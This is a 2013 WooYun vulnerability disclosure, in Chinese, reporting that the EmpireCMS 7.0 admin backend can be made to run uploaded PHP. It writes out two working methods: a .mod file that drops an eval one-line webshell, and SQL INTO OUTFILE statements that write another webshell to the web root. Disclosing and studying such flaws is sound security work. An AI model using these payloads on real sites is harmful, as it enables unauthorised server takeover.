当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(21) 关注此漏洞

缺陷编号: WooYun-2013-23185

漏洞标题: 帝国cms 7.0 后台拿shell

相关厂商: 帝国CMS(EmpireCMS)

漏洞作者: 0xTback

提交时间: 2013-05-07 14:19

公开时间: 2013-08-05 14:19

漏洞类型: 文件上传导致任意代码执行

危害等级: 中

自评Rank: 8

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 代码执行 帝国CMS

10人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-08-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码。

详细说明:

进入后台~!



方法一:



系统——数据表与系统模型——管理数据表

再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:

QQ截图20130506192307.gif





“导入系统模型”,可进入“LoadInM.php”页面,如图:

QQ截图20130506192844.gif





在本地新建一个文件,文本内容为<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>")?> 再命名为1.php.mod,导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件。



可以从导入系统模型源文件中查看到,如图:

QQ截图20130506193833.gif







方法二:

在本地新建一个info.php(任意php文件)其源码内容为<?php phpinfo();?>,再重名名为info.php.mod,将此文件按照方法一导入系统模型,即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:

QQ截图20130506194806.gif







QQ截图20130506195011.gif



info.php.mod的源码



然后

系统——备份与恢复数据——执行SQL语句

在执行SQL语句框中输入如下代码:

create table temp (cmd text not null);

insert into temp (cmd) values('<?php eval($_POST[x])?>');

select cmd from temp into outfile 'c://ecms//z.php';

drop table if exists temp;

即可在网站根目录生成z.php

菜刀连接即可~!

漏洞证明:

QQ截图20130506194214.gif





QQ截图20130506200357.gif

修复方案:

过滤吧~!!

版权声明:转载请注明来源 0xTback@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-08-05 23:59 | blacksun ( 路人 | Rank:13 漏洞数:1 | blacksun)
    0

    很多cms好像都通杀啊……

  2. 2013-08-06 09:08 | khjian ( 普通白帽子 | Rank:133 漏洞数:64 | 网站程序员,项目经理,擅长asp,php,asp.ne...)
    0

    真心不错!

  3. 2014-03-29 22:20 | j2ck3r ( 普通白帽子 | Rank:424 漏洞数:98 | 别关注我,跟你不熟。)
    14

    怎么进后台呢

登录后才能发表评论,请先 登录